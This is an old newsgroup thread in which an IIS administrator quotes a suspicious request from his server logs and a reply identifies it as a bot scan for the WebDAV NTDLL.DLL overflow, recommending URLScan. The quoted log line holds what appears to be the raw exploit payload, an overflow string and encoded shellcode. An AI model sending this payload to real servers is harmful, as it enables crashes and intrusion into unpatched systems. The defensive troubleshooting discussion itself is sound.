It looks like a scan for the old NTDLL.DLL vulnerability via WebDAV that was
fixed by the MS03-007 patch. The resurgence of these scans now is probably
due to the Agobot / Gaobot / Polybot / Phatbot family of trojans.
URLScan and IIS Lockdown is a good bet, I would have wanted it on there
right from the start of the server's life. I wouldn't recommend running an
IIS 5 or older server without it.
[quoted text, click to view] "Kfir" <kc@csgglobal.com> wrote in message
news:564701c42d07$6f5292c0$a101280a@phx.gbl...
I may found a new security hole in IIS. Some of my
websites stopped responding on http, I checked the logs
and found this:
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA?????????????????????????????????????
####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlim
ddddddrfsmlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpid
jndjjndfididjlddddddhdigssejlgslsskhfmlosljnddlopjlgpdelid
loilspiglgpddhidikssijdhidikssijdlillipdkhdmloqpggpdidigss
ijdpssijedieijlohigploihflkldgqiiflokffddgsiggpmhmhenqdgpi
ggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinloinfhdgqqjjlo
dpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskmdnrl
somksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddh
ddddddssssddddolddddddddddddddhddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddrldddddddreson
drddohdmpqfeoldehppqfeihjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjs
khfdjfjifdkfkijrfdjmjrfdhhhsigfdjqjsjhjifrdqdqdnfhdddddddd
ddddddnigldipkreimjomhreimjomhreimjomhmnhijkmhrgimjomhjfhi
jimhrgimjomhlrhjjemhrnimjomhlrhjjsmhrgimjomhreimjnmhljimjo
mhjfiegjmhrlimjomhrkknjdmhrdimjomhifjmjgjlreimjomhdddddddd
ddddddddddddddddddddddddddddddddddddddddidhiddddhpdedgddiq
rlegjeddddddddddddddddrddddsdedodekmqkddgdddddddedddddddmd
ddddndpnddddddndddddddqdddddddddhdddddeddddddddfdddddhdddd
dddddddddddhddddddddddddddddrddddddddhdddddddddddddgdddddd
ddddedddddedddddddddedddddedddddddddddddeddddddddddddddddd
ddddddddqdddddgldedddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddmdddddddeddddddddddddddddh
ddddddddddddddddddddddddddddldddddrdddddddddddddddddddgddd
ddddndddddddfpdddddddhddddddddddddddddddddddddddddhdddddrd
ddddddddddddddddddedddddddqddddddddfddddddgddddddddddddddd
ddddddddddddddhdddddpddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddsssseirlhdhdddrldddddqoplipdkigi
jldhdednjlkhngefidojsfppjpemrpedgpklfmsdiooosqhsfnsplgsldf
kidirmdmdefpdhddhpsrqskrpmpgmdlerpdldfeflqhhfhddijiklogqgl
hehdsossompigpifrdjpqklgphdplqhpfhdljnddiejhkkjgosqqigrdhd
dirhhdkdgpfrlogihdsjkkkskgdifkdhssqjmmomdiirsksmloehmiklir
egqsmrhpqlifeejhfidkdsldkmdihlonookksslgplslhdlodhlioqgqme
pkliirdkffkpmrehpqhhfmdpiokihkrhlegrkjsepnidopsflpskgoieeo
qoqosssssseirlhdhdddrldddddqoplipdkigijldhdednjlkhngefidoj
sfppjpemrpedgpklfmsdiooosqhsfnsplgsldfkidirmdmdefpdhddhpsr
qskrpmpgmdlerpdldfeflqhhfhddijiklogqglhehdsossompigpifrdjp
qklgphdplqhpfhdljnddiejhkkjgosqqigrdhddirhhdkdgpfrlogihdsj
kkkskgdifkdhssqjmmomdiirsksmloehmikliregqsmrhpqlifeejhfidk
dsldkmdihlonookksslgplslhdlodhlihheilqlpfhehohidjlqlkgiesg
kfhlikfhdesrehligpqmrqkhokneepiffmfhlpqpjlqnjdrskkqodpklfh
dkdeopisirlephpmqokksgsqjsddlgrpedjlsljpogqpggpdpkrmkknsqo
grgplmdkdldgdpsmegdhkdeeoooikkjgqeglfhskqleopddgkpphedhplf
rmqrojjlpdefddjrheghkhkgmosssjngshnikokhghjndejnddjndffmip
dldnofoeiljhdhlodsdgenkfreiorhdehsgdpfdlddjsnddejrjrfogped
igiikesgdfogimmlhesskqrkkrdslijpdqfpedrpnesdnieekhempkdiql
sromprkikoileknieddjesdjrproekoofkfkpseljhdddedlgpdhdplphp
jkhldlndmnehdskskkskesnllqdpldlofqpheqloeqpldilqdhhllqehld
neklpkliqslhlfjqlmihjgkpgnfpksginegldroksorjdhdmsskhfoidgp
egsphhjrmiesgoonerokehdsepidedldffqmlqnqsoqsssqgnldgjqqidn
pphdeflipqlqoeejqjhsqdhdhlkdheeoioodrjnghpkmqklgjkehekdhkg
mssqjqikiffkjlndfjghjjngqhqehqrlkrmqsodslhjgqdienegjjnsspm
qhrmkjdqpspoelipoheldlereprrfedgejkoskeffpdhfhkpjlmdjekqeq
eoqrpqlsilmrfqklngkdmggrdijlqdssqnqjdpililieqgmqlolosdlerj
sspgqldpleddqknolgsndgkkeqssfhmijeslqsqpipeheqnmedperfeddg
sfrodolojikqmdjsooeiperddpsdfoeodldslkmi - 404 -
This is some kind of URL Request that after getting it a
few times IIS will stop responding on HTTP.
It came from different IP addresses in the world and
seems to be from machines with Windows98 (Trojan horse
maybe?)
I fixed it with installing URLSCAN tool on IIS which
automatically rejects these requests.
If anyone has information about it or has seen it too
please reply here.
Regards,
Kfir cohen -MCSE
Systems Manager.